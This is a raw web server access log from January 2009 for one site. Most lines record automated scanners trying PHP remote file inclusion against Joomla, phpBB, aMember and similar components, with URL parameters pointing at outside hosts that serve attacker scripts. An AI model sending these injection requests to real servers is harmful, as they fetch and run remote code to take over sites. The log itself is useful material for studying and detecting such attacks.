216.97.226.250 - - [30/Jan/2009:08:29:22 -0800] "GET /logs/access_080429.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:29:25 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:26 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:26 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:29:27 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:29:27 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:28 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:28 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:28 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:29 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:29 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:33 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:29:33 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:29:46 -0800] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:29:47 -0800] "GET /logs/access_080504.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:29:56 -0800] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:29:59 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:30:22 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:30:36 -0800] "GET /logs/access_081103.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:30:44 -0800] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:30:49 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:30:49 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:30:49 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:30:53 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:31:01 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:03 -0800] "GET /logs/access_080426.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:31:03 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95190 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:31:09 -0800] "GET /logs/access_080531.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:12 -0800] "GET /logs/access_081125.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:08:31:12 -0800] "GET /logs/access_090110.log HTTP/1.0" 200 1376256 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:14 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:19 -0800] "GET /logs/access_080805.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:38 -0800] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:42 -0800] "GET /logs/access_080428.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:31:44 -0800] "GET /logs/access_080712.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:31:50 -0800] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.182.82 - - [30/Jan/2009:08:32:21 -0800] "GET /logs/access_081223.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.45.182.82 - - [30/Jan/2009:08:32:21 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.45.182.82 - - [30/Jan/2009:08:32:21 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:08:32:31 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.wiseover.com/board/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:08:32:31 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.wiseover.com/board/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:32:33 -0800] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:32:51 -0800] "GET /logs/access_080517.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ilco.org//cache/ready?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:32:52 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ilco.org//cache/ready?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:33:01 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:10 -0800] "GET /logs/access_080925.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:14 -0800] "GET /logs/access_080516.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:32 -0800] "GET /logs/access_080513.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:34 -0800] "GET /logs/access_080515.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:33:35 -0800] "GET /logs/access_080413.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:42 -0800] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:33:45 -0800] "GET /logs/access_080917.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.34.104.91 - - [30/Jan/2009:08:33:53 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://members.mywave.at/m206111aa/cms/langs/maxid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.104.91 - - [30/Jan/2009:08:33:53 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://members.mywave.at/m206111aa/cms/langs/maxid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.104.91 - - [30/Jan/2009:08:34:03 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://members.mywave.at/m206111aa/cms/langs/maxid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.104.91 - - [30/Jan/2009:08:34:05 -0800] "GET /logs/access_080326.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://members.mywave.at/m206111aa/cms/langs/maxid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:34:37 -0800] "GET /logs/access_080618.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:34:38 -0800] "GET /logs/access_080928.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:34:39 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:39 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:39 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:39 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:42 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:42 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:42 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:44 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:34:46 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:34:55 -0800] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:34:56 -0800] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:34:57 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:34:57 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:34:58 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:35:00 -0800] "GET /logs/access_080618.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:35:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:35:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:35:02 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:21 -0800] "GET /logs/access_080910.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.76.199.10 - - [30/Jan/2009:08:35:31 -0800] "GET /logs/access_080711.log HTTP/1.1" 200 2821755 "http://www.dmulk.com/logs/access_080711.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:33 -0800] "GET /logs/access_081201.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:34 -0800] "GET /logs/access_080811.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:39 -0800] "GET /logs/access_090103.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:39 -0800] "GET /logs/access_081025.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:35:39 -0800] "GET /logs/access_080412.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:36:14 -0800] "GET /logs/access_080729.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.160.189.249 - - [30/Jan/2009:08:36:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
202.160.178.77 - - [30/Jan/2009:08:36:20 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:36:20 -0800] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
